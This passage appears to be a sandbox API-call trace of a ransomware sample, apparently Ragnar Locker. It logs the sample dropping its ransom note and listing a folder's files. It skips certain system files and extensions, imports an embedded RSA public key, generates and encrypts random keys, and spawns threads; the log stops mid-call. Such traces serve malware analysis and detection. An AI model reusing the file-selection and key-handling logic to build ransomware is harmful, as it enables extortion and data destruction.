lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\" [0169.148] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1028\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\" [0169.148] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\!$R4GN4R_B8CF767A$!.txt" [0169.149] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1028\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0169.156] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*" [0169.156] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.156] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.156] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.156] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547b40 [0169.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0169.157] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf22a4e4f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.159] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0169.159] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0169.159] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf22a0071, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf22a0071, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0169.159] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0169.159] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0169.159] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.159] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0169.160] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0169.160] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0169.160] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0169.160] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0169.160] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0169.160] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0169.160] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0169.160] FindNextFileW (in: hFindFile=0x3547b40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0169.160] FindClose (in: hFindFile=0x3547b40 | out: hFindFile=0x3547b40) returned 1 [0169.160] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548240 [0169.160] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf22a4e4f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf22a4e4f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.161] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf22a0071, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf22a0071, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0169.161] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.161] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0169.161] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0169.161] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0169.161] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.161] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.161] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0169.161] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned=".rtf" [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0169.161] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0169.162] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0169.162] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0169.162] GetProcessHeap () returned 0x3520000 [0169.162] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0169.162] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" [0169.162] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0169.162] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.163] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0169.163] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned=".xml" [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0169.163] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0169.180] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0169.180] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0169.180] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0169.181] GetProcessHeap () returned 0x3520000 [0169.181] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0169.183] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0169.183] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0169.183] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1028\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.183] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0169.183] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned=".dll" [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0169.183] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0169.184] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0169.184] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0169.184] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0169.184] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0169.184] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0169.184] GetProcessHeap () returned 0x3520000 [0169.184] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x357e308 [0169.184] CryptAcquireContextW (in: phProv=0x357e308, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x357e308*=0x3556cc0) returned 1 [0169.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0169.185] GetProcessHeap () returned 0x3520000 [0169.185] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x3593368 [0169.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x3593368, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0169.186] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.186] GetProcessHeap () returned 0x3520000 [0169.186] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x3540c78 [0169.186] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x3540c78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3540c78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.186] GetProcessHeap () returned 0x3520000 [0169.186] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3593368 | out: hHeap=0x3520000) returned 1 [0169.186] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3540c78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0169.186] CryptImportPublicKeyInfo (in: hCryptProv=0x3556cc0, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x357e30c | out: phKey=0x357e30c*=0x3548280) returned 1 [0169.186] GetProcessHeap () returned 0x3520000 [0169.186] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3540c78 | out: hHeap=0x3520000) returned 1 [0169.186] LocalFree (hMem=0x35948f0) returned 0x0 [0169.186] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3557188) returned 1 [0169.187] CryptGenRandom (in: hProv=0x3557188, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0169.187] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0169.187] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0169.190] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556550) returned 1 [0169.191] CryptGenRandom (in: hProv=0x3556550, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0169.191] CryptReleaseContext (hProv=0x3556550, dwFlags=0x0) returned 1 [0169.191] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0169.194] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556e58) returned 1 [0169.195] CryptGenRandom (in: hProv=0x3556e58, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0169.195] CryptReleaseContext (hProv=0x3556e58, dwFlags=0x0) returned 1 [0169.195] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0169.334] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35565d8) returned 1 [0169.335] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0169.335] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0169.335] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0169.344] CryptEncrypt (in: hKey=0x3548280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0169.345] GetLastError () returned 0x80090016 [0169.345] CryptEncrypt (in: hKey=0x3548280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0169.345] GetLastError () returned 0x80090016 [0169.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x5b8) returned 0x3b4 [0169.346] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556880) returned 1 [0169.347] CryptGenRandom (in: hProv=0x3556880, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0169.347] CryptReleaseContext (hProv=0x3556880, dwFlags=0x0) returned 1 [0169.347] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0169.367] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 